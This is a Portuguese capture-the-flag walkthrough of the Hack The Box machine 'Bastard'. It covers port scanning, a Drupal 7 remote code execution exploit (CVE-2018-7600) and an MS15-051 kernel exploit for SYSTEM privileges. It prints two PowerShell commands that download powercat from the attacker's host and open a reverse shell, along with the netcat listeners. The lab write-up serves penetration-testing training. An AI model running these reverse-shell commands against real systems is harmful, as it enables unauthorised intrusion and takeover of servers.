Bastard
Referência em video
Resumo
Enumeração Web
Traduzir exploit de python 2 para python 3
Obtendo a execução de comando no servidor (Drupal 7 - CVE-2018-7600)
Escalação de privilégio (Enumeração de permissões de usuário)
Enumeração da versão do windows (kernel exploit)
Exploração de kernel
Enumeração
Como sempre, começamos com a enumeração básica de serviços:
TCP
sudo nmap_enum bastard.htb
e
sudo nmap -p- -T5 --max-retries 0 -n -Pn bastard.htb
Enumeração UDP
sudo nmap -p 111,113,53,161,500,2049 bastard.htb
Enumeração Web
Com a presença de um serviço web, nosso primeiro alvo nessa máquina (o critério de onde começar ou por qual serviço você deve começar vai de seu feeling mesmo) já identificamos um drupal lá. Analisando os cabeçalhos na resposta HTTP, foi possível identificar que é um Drupal 7. Por isso já fizemos uma procura por exploits para esse cara:
searchsploit drupal 7.0
Aqui encontramos alguns exploits, mas o que funcionou foi esse cara aqui:
Exploitation
python drupa7-CVE-2018-7600.py -c "powershell -ExecutionPolicy bypass -c \"iex(new-object system.net.webclient).downloadstring('http://10.10.16.6/powercat.ps1');powercat -e cmd -c 10.10.16.6 -p 8081\""
Na máquina do Kal Linux temos de entregar o payload e subir o listener:
python -m http.server 80
nc -nlvp 8081
Depois disso, já conseguimos a shell:
Então aqui já conseguimos a shell
Escalação de Privilégio
ou Escalação de Privilégios, vamos começar com:
Enumeração de permissões do usuário
whoami /priv
ou
whoami /all
Identificamos o SeImpersonate, porém, sem sucesso na exploração.
Porém, ao analisar a versão do Windows, se tratava de um 2008 R2 SEM PATCHES!!! Isso foi interessante pra gente utilizar a exploração de kernel para subir privilégio na máquina:
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/README.md
Nesse link encontramos vários exploits, dentre eles o que funcionou já está destacado.
ms15-01.exe "powershell -ExecutionPolicy bypass -c \"iex(new-object system.net.webclient).downloadstring('http://10.10.16.6/powercat.ps1');powercat -e cmd -c 10.10.16.6 -p 8082\""
Basta subir o listener no Kali Linux para obter a shell reverse com usuário System!! :D
nc -nlvp 8082